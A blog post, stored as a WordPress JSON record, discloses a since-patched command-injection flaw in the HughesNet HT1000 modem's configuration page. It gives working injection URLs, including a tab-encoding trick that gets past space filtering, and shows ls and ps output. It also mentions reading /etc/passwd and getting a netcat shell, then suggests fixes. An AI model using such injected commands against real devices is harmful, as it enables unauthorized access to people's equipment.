{"id":193,"date":"2013-08-23T10:11:02","date_gmt":"2013-08-23T18:11:02","guid":{"rendered":"http:\/\/jacksontech.net\/?p=193"},"modified":"2014-07-10T13:30:44","modified_gmt":"2014-07-10T21:30:44","slug":"ht1000-url-parsing-vulnerability","status":"publish","type":"post","link":"https:\/\/jacksontech.net\/index.php\/2013\/08\/ht1000-url-parsing-vulnerability\/","title":{"rendered":"HT1000 URL Parsing Vulnerability (now fixed!)"},"content":{"rendered":"<p><em>Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes.<br \/>\n<\/em><\/p>\n<p>The HT1000 modem has a configuration\/status webpage called the &#8220;System Control Center&#8221; (SCC) at the IP address 192.168.0.1. Certain malformed URLs within the SCC will cause an arbitrary command to be executed on the modem as an unprivileged user.<\/p>\n<p>This security hole is related to the command to enable and disable Web Acceleration.<\/p>\n<p><!--more--><\/p>\n<p>To disable WAC, the following URL is called:<\/p>\n<pre>http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&amp;disableWAC=on<\/pre>\n<p>To enable WAC, this URL is called:<\/p>\n<pre>http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314<\/pre>\n<p>However, it appears that arbitrary commands can be executed through this URL. Inserting a semicolon and then an arbitrary command results in that command being executed, with the output being piped back to the web browser. For example, visiting the following URL results in some unexpected output:<\/p>\n<pre>http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&amp;;ls<\/pre>\n<pre>Command cannot be executed. URI: \/wac_userdisable query: command.cgi\r\nindex.cgi\r\ninstall.cgi\r\npktdump.cgi\r\nreg.cgi\r\nstatscmd.cgi\r\ntestcmd.cgi\r\nwitcmd.cgi<\/pre>\n<p>This is the output of the Linux command <em>ls<\/em>. 
pktdump.cgi is of particular interest&#8230;<\/p>\n<p>Although spaces are filtered out by the web server (throwing a 501 Not Implemented page), tabs are not. As such, longer commands can be crafted.<\/p>\n<pre>http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&amp;;ps%09-w<\/pre>\n<pre>Command cannot be executed. URI: \/wac_userdisable query:   PID USER       VSZ STAT COMMAND\r\n    1 root      1812 S    init  \r\n    2 root         0 SW&lt;  [kthreadd]\r\n    3 root         0 SW&lt;  [ksoftirqd\/0]\r\n    4 root         0 SW&lt;  [events\/0]\r\n    5 root         0 SW&lt;  [khelper]\r\n    6 root         0 SW&lt;  [kblockd\/0]\r\n    7 root         0 SW&lt;  [kseriod]\r\n    8 root         0 SW   [pdflush]\r\n    9 root         0 SW   [pdflush]\r\n   10 root         0 SW&lt;  [kswapd0]\r\n   11 root         0 SW&lt;  [aio\/0]\r\n   12 root         0 SW&lt;  [nfsiod]\r\n   21 root         0 SW&lt;  [mtdblockd]\r\n   22 root         0 SW&lt;  [rpciod\/0]\r\n   29 root      2260 S    klogd -c 4 \r\n   55 root      3016 S    \/bin\/sh \/etc\/restartMon.sh \r\n   68 root         0 SW&lt;  [loop0]\r\n   80 root         0 SWN  [jffs2_gcd_mtd4]\r\n  148 root         0 SW   [dlpktproc_Data]\r\n  149 root         0 SW   [dlpktproc_Monit]\r\n  155 root         0 SW   [kpep]\r\n  319 root     30728 S    \/fl0\/apps\/logrt \r\n  321 root     11280 S    .\/sysmon \r\n  324 root      3080 S    \/sbin\/getty console \r\n  325 root      1984 S    \/sbin\/syslogd \r\n  329 root     19392 S    cfm 0 \r\n  331 root     11608 S    tfw 1 \r\n  334 root     17136 S    cac 2 \r\n  335 root     31856 S    amu 3 \r\n  336 root     11436 S    ledif 4 \r\n  337 root     29448 S    tmu 5 \r\n  338 root     41128 S    downlink 6 \r\n  343 root     49556 S    uplink 7 \r\n  344 root     18684 S    sdlmgr 8 \r\n  351 root     28396 S    assoc 9 \r\n  364 root     63292 S    diagmgr 10 \r\n  365 root     27100 S    sysinfo 11 \r\n  367 root     28388 S    sbc 12 \r\n  368 root     20008 S    
evtmgr 13 \r\n  370 root     17220 S    ddnsc 14 \r\n  371 root     17276 S    vptMgr 15 \r\n  373 root     11544 S    dnsWrapper 16 \r\n  375 root     11148 S    odumonitor 18 \r\n  441 daemon    5136 S    HttpServer -d -4 -c \/etc\/httpd.conf \r\n  448 root     36012 S    web15 \r\n  453 root      3608 S    Ntpd -g -c \/etc\/ntp.conf -p \/var\/run\/ntpd.pid \r\n  520 root      4692 S    \/usr\/sbin\/sshd -h \/fl0\/ssh\/ssh_host_key -h \/fl0\/ssh\/ssh_host_rsa_key -h \/fl0\/ssh\/ssh_host_dsa_key \r\n  537 root     10888 S    Dhcpv4Server -4 -cf \/etc\/dhcpd_v4.conf -lf \/var\/dhcp\/dhcpd_v4.leases -pf \/var\/run\/dhcpd_v4.pid eth0 \r\n  539 root     33524 S    Dhcpv6Server -6 -cf \/etc\/dhcpd_v6.conf -lf \/var\/dhcp\/dhcpd_v6.leases -pf \/var\/run\/dhcpd_v6.pid eth0 \r\n  541 root     21908 S    snmpd -f -p \/var\/run\/snmpd.pid -c \/etc\/snmpd.conf \r\n  543 root      1960 S    radvd \r\n  546 nobody   12096 S    dnsmasq -x \/var\/run\/dnsmasq.pid -q -Q 8054 -p 10054 \r\n 4137 root      2884 S    sleep 5 \r\n 4138 daemon    5272 S    HttpServer -d -4 -c \/etc\/httpd.conf \r\n 4139 root     30068 S    command.cgi \r\n 4140 daemon    3016 S    sh -c wget -O - -q http:\/\/localhost:8088\/wac_userdisable?;ps -w \r\n 4143 daemon    3192 R    ps -w<\/pre>\n<p>The sh command line visible above suggests that at least a portion of the URL is being piped directly to <em>sh<\/em>!<\/p>\n<p>Unfortunately, the filesystem permissions on the modem are not very robust. \/etc\/passwd is not protected at all and can be accessed in this same way. Furthermore, <em>netcat<\/em> is available on the modem, which makes it very trivial to set up an unprivileged shell, but that is far beyond the scope of this post.<\/p>\n<p>I hope this is enough information for HughesNet to pinpoint the URL handling bug and squash it flat.<\/p>\n<p>To HughesNet employees, here are my suggestions for fixing it:<\/p>\n<p>I see two quick &#8216;n dirty options.<\/p>\n<p>1) Mod the webserver (nhttpd?) 
to filter out tabs as well as spaces in URLs, and\/or make it scream if it sees a semicolon or other special shell characters.<\/p>\n<p>2) Mod the .cgi app that calls the little app hanging around at localhost:8088 to similarly scream at special bash characters like semicolons.<\/p>\n<p>For best security, do both. If you do #2 but not #1, another engineer may write a similar piece of code and introduce a new vulnerability.<\/p>\n<p><em>Note: HughesNet pushed out software version 2.2.0.9, which closed this hole on the HT1000. The HT1100 modem, which sports a newer firmware revision when shipped, never had this vulnerability. It appears the hole was closed by modifying the onboard webserver to prevent nasty input from even reaching the underlying bash script.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes. The HT1000 modem has a configuration\/status webpage called the &#8220;System Control Center&#8221; (SCC) at the IP address 192.168.0.1. 
Certain malformed URLs within the SCC will cause &#8230; <a class=\"moretag\" href=\"https:\/\/jacksontech.net\/index.php\/2013\/08\/ht1000-url-parsing-vulnerability\/\">more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,5,3,4],"tags":[7,8,6],"class_list":["post-193","post","type-post","status-publish","format-standard","hentry","category-comptech","category-linux","category-networking","category-security","tag-ht1000","tag-hughesnet","tag-satellite"],"_links":{"self":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/comments?post=193"}],"version-history":[{"count":13,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193\/revisions"}],"predecessor-version":[{"id":392,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193\/revisions\/392"}],"wp:attachment":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/media?parent=193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/categories?post=193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/tags?post=193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}